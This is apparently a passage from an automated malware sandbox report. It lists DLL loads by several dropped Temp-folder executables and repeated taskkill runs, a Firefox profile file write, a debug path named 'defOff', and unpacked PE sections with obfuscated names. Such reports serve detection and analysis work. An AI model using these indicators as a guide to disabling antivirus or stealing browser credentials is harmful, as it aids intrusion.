Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 2994688 > 1048576
Source: file.exe Static PE information: Raw size of hinhbduz is bigger than: 0x100000 < 0x2b1c00
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe, 00000005.00000002.2418802394.0000000000A32000.00000040.00000001.01000000.00000009.sdmp, QDDSFWH7TPMYGYIMIOWX7SBOU5.exe, 00000005.00000003.2283631779.0000000004700000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Unpacked PE file: 3.2.S14AV77TIR9DRWSCWIW0.exe.de0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ptpgbbgo:EW;epijyeip:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ptpgbbgo:EW;epijyeip:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Unpacked PE file: 4.2.7RNKVR1EZ552XQ73.exe.2d0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;njaoxwad:EW;wxwvdadu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;njaoxwad:EW;wxwvdadu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Unpacked PE file: 5.2.QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.a30000.0.unpack :EW;.rsrc:W;.idata :W;ohppgexj:EW;lrldjnhc:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.fe0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ptpgbbgo:EW;epijyeip:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ptpgbbgo:EW;epijyeip:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 8.2.skotes.exe.fe0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ptpgbbgo:EW;epijyeip:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ptpgbbgo:EW;epijyeip:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Unpacked PE file: 9.2.976d9f40c1.exe.ff0000.0.unpack :EW;.rsrc :W;.idata :W;hinhbduz:EW;spippvyb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;hinhbduz:EW;spippvyb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Unpacked PE file: 10.2.606f2f6db0.exe.e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;njaoxwad:EW;wxwvdadu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;njaoxwad:EW;wxwvdadu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Unpacked PE file: 11.2.976d9f40c1.exe.ff0000.0.unpack :EW;.rsrc :W;.idata :W;hinhbduz:EW;spippvyb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;hinhbduz:EW;spippvyb:EW;.taggant:EW;
